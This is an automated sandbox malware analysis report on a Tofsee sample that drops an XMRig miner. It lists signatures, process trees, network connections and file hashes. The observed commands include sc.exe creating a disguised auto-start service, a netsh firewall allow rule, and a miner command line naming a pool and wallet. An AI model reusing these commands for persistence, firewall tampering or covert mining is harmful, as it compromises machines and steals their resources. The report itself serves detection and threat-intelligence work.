Analysis Overview
SHA256
d67fc64d34afd907136004df31bd8c6309f4904094fce34e873fa361ac76e0dd
Threat Level: Known bad
The file 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.zip was found to be: Known bad.
Malicious Activity Summary
Tofsee
xmrig
XMRig Miner payload
Creates new service(s)
Modifies Windows Firewall
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-19 23:50
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-19 23:50
Reported
2023-11-19 23:55
Platform
win7-20231020-en
Max time kernel
5s
Max time network
162s
Command Line
Signatures
Tofsee
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\permvqxi\
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe" C:\Windows\SysWOW64\permvqxi\
C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create permvqxi binPath= "C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d\"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe\"" type= own start= auto DisplayName= "wifi support"
C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description permvqxi "wifi internet conection"
C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start permvqxi
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe
C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 20.112.250.133:80 | microsoft.com | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 8.8.8.8:53 | microsoft-com.mail.protection.outlook.com | udp |
| US | 52.101.8.49:25 | microsoft-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | vanaheim.cn | udp |
| RU | 158.160.73.47:443 | vanaheim.cn | tcp |
| RU | 80.66.75.77:483 | tcp | |
| US | 8.8.8.8:53 | 13.71.61.154.dnsbl.sorbs.net | udp |
| US | 8.8.8.8:53 | 13.71.61.154.bl.spamcop.net | udp |
| US | 8.8.8.8:53 | 13.71.61.154.zen.spamhaus.org | udp |
| US | 8.8.8.8:53 | 13.71.61.154.sbl-xbl.spamhaus.org | udp |
| US | 8.8.8.8:53 | 13.71.61.154.cbl.abuseat.org | udp |
| US | 8.8.8.8:53 | yahoo.com | udp |
| US | 8.8.8.8:53 | mta5.am0.yahoodns.net | udp |
| US | 98.136.96.74:25 | mta5.am0.yahoodns.net | tcp |
| RU | 62.122.184.92:427 | tcp | |
| UA | 45.143.201.238:427 | tcp | |
| RU | 176.113.115.84:427 | tcp | |
| RU | 80.66.75.4:427 | tcp | |
| RU | 176.113.115.135:427 | tcp | |
| RU | 176.113.115.136:427 | tcp | |
| N/A | 83.97.73.44:427 | tcp | |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.ru | udp |
| NL | 142.251.36.35:443 | www.google.ru | tcp |
| US | 8.8.8.8:53 | oauth.vk.com | udp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| FR | 52.98.228.34:993 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | smtp.google.com | udp |
| NL | 142.250.102.26:25 | smtp.google.com | tcp |
| US | 8.8.8.8:53 | fastpool.xyz | udp |
| BG | 213.91.128.133:10060 | fastpool.xyz | tcp |
| US | 8.8.8.8:53 | work.a-poster.info | udp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| US | 8.8.8.8:53 | mail.ru | udp |
| US | 8.8.8.8:53 | mxs.mail.ru | udp |
| RU | 217.69.139.150:25 | mxs.mail.ru | tcp |
| US | 8.8.8.8:53 | api.luisaviaroma.com | udp |
| NL | 104.110.240.155:443 | api.luisaviaroma.com | tcp |
| LT | 93.115.25.10:80 | 93.115.25.10 | tcp |
| RU | 80.66.75.77:483 | tcp | |
| US | 8.8.8.8:53 | 13.71.61.154.in-addr.arpa | udp |
| LT | 93.115.25.73:80 | 93.115.25.73 | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| LT | 93.115.25.13:80 | 93.115.25.13 | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| US | 8.8.8.8:53 | www.sivasdescalzo.com | udp |
| US | 104.18.232.222:443 | www.sivasdescalzo.com | tcp |
| US | 104.18.232.222:443 | www.sivasdescalzo.com | tcp |
| US | 8.8.8.8:53 | registrierung.web.de | udp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
Files
memory/2216-1-0x0000000000690000-0x0000000000790000-memory.dmp
memory/2216-2-0x0000000000220000-0x0000000000233000-memory.dmp
memory/2216-4-0x0000000000400000-0x00000000004F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe
| MD5 | 41e5c245a82a8504a70527e839ae883e |
| SHA1 | 080f8d3a98ac6769752e221403d17354a4afa0b5 |
| SHA256 | 51fd31d38d471d045b16fd4b4fedc2cd52aedfe29845cc212e8d61bf5758e746 |
| SHA512 | b281798cb0e3cf7c7bcf001dc7ff8f5f10af5e3b6c6ac12d286a0d07fb9e7d718c8b2c4e5f32df7fd50f4e7de92e1eefd353f7cb5a6b4d537dfae67648188b69 |
memory/2216-6-0x0000000000400000-0x00000000004F3000-memory.dmp
C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe
| MD5 | 9bbc5d1f6be289e2071874e4a8e1815a |
| SHA1 | 362815bd2e08ecca3f49caa89dc21b2fbd104dcf |
| SHA256 | c0ae437eaa40a777b2087deaadd1fabe001c2fc6208f54033b7eaa39847a3847 |
| SHA512 | fce8a86aaa9284f5edc42a69af9ca3bcaaa3b524877b13a55705f330876f5c0871f46fd216aef955f541ac231379af2866ae8eca7805fb8c03114b7991aac525 |
memory/2760-9-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2764-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2760-16-0x0000000000400000-0x00000000004F3000-memory.dmp
memory/2764-19-0x0000000000080000-0x0000000000095000-memory.dmp
memory/2764-18-0x0000000000080000-0x0000000000095000-memory.dmp
memory/2764-20-0x0000000000080000-0x0000000000095000-memory.dmp
memory/2764-14-0x0000000000080000-0x0000000000095000-memory.dmp
memory/2760-12-0x0000000000400000-0x00000000004F3000-memory.dmp
memory/2764-10-0x0000000000080000-0x0000000000095000-memory.dmp
memory/2764-22-0x00000000019C0000-0x0000000001BCF000-memory.dmp
memory/2764-29-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-38-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-49-0x00000000006D0000-0x00000000006D5000-memory.dmp
memory/2764-52-0x00000000006D0000-0x00000000006D5000-memory.dmp
memory/2764-53-0x0000000005830000-0x0000000005C3B000-memory.dmp
memory/2764-48-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-47-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-46-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-57-0x00000000009F0000-0x00000000009F7000-memory.dmp
memory/2764-56-0x0000000005830000-0x0000000005C3B000-memory.dmp
memory/2764-45-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-44-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-43-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-42-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-41-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-40-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-39-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-37-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-36-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-35-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-34-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-33-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-32-0x0000000000430000-0x0000000000440000-memory.dmp
memory/2764-26-0x0000000000190000-0x0000000000196000-memory.dmp
memory/2764-25-0x00000000019C0000-0x0000000001BCF000-memory.dmp
memory/2764-61-0x0000000000080000-0x0000000000095000-memory.dmp
memory/1276-63-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-62-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-72-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-77-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-76-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-75-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-74-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-73-0x0000000000260000-0x0000000000351000-memory.dmp
memory/1276-71-0x0000000000260000-0x0000000000351000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-19 23:50
Reported
2023-11-19 23:55
Platform
win10v2004-20231023-en
Max time kernel
132s
Max time network
157s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.254.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.254.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |